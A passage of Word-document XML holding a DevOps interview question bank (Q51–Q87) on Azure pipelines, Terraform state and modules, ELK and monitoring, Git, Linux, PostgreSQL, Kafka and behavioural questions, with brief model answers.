    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q51. Explain Azure DevOps pipelines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Azure DevOps Pipelines is a CI/CD service for building, testing, and deploying applications across cloud and on-prem environments. Pipelines can be defined as YAML, use Microsoft-hosted or self-hosted agents, and integrate well with Azure services, approvals, environments, and artifacts.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Azure Devops Pipelines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 How do you handle deployment failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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handle deployment failures?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q53. How do you implement rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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implement rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q54. How do you deploy to Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the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deploy to Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q55. Explain Terraform state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform state records the mapping between configuration and real infrastructure. It is critical for planning changes, detecting drift, and managing resource lifecycle.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform State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Q56. What is a remote backend?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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a remote backend?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q57. How do you manage Terraform state?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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manage Terraform state?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q58. What are Terraform modules?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Terraform modules package reusable infrastructure configuration. They help standardize resource creation, reduce duplication, and enforce best practices across teams.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Terraform Modules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Q59. Explain lifecycle in Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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lifecycle in Terraform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q60. How do you manage secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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manage secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q61. How do you resolve state conflicts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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resolve state conflicts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q62. Which monitoring tools have you used?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring &amp; Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Monitoring &amp; Logging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monitoring tools have you used?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q63. Explain ELK Stack.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring &amp; Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: The ELK stack combines Elasticsearch, Logstash, and Kibana for log ingestion, indexing, search, and visualization. Many deployments now use Elastic Stack with Beats and other components.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Elk Stack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 Explain Grafana.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring &amp; Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Monitoring &amp; Logging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Grafana.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q65. How do you troubleshoot production issues?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring &amp; Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Monitoring &amp; Logging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troubleshoot production issues?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q66. How do you investigate logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Monitoring &amp; Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Monitoring &amp; Logging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investigate logs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q67. Explain Git branching strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Git &amp; DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Git &amp; DevOps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Git branching strategy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q68. What is the difference between merge and rebase?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Git &amp; DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Git &amp; DevOps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merge and rebase?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q69. Explain GitHub workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Git &amp; DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Git &amp; DevOps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GitHub workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q70. How do you resolve merge conflicts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Git &amp; DevOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Git &amp; DevOps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resolve merge conflicts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q71. Which Linux commands do you use daily?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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Linux commands do you use daily?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q72. How do you check CPU, memory, and disk usage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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check CPU, memory, and disk usage?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q73. How do you troubleshoot a Linux server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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troubleshoot a Linux server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q74. Which databases have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Databases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Databases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databases have you worked on?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q75. Explain PostgreSQL basics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Databases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Databases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PostgreSQL basics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q76. How do you troubleshoot database connectivity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Databases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Databases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troubleshoot database connectivity?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q77. Have you worked with Kafka?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kafka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with Kafka?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q78. Explain Kafka architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kafka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Kafka architecture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q79. What are topics, partitions, and consumer groups?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kafka</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kafka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topics, partitions, and consumer groups?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q80. Tell me about a critical production issue you resolved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production &amp; Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production &amp; Scenarios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Tell me about a critical production issue you resolved.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q81. What was the toughest issue you have handled?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production &amp; Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production &amp; Scenarios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was the toughest issue you have handled?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q82. Describe a time you had to make a trade-off under pressure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production &amp; Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production &amp; Scenarios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Describe a time you had to make a trade-off under pressure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q83. What production issue did you troubleshoot from start to finish?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production &amp; Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production &amp; Scenarios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production issue did you troubleshoot from start to finish?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q84. How do you perform root cause analysis (RCA)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production &amp; Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Production &amp; Scenarios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perform root cause analysis (RCA)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q85. How do you prioritize incidents?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Production &amp; Scenarios</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Q86. Tell me about a challenging project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral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Tell me about a challenging project.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q87. Tell me about a conflict with a team member.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Behavioral</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Behavioral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Tell me about a conflict with a team member.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
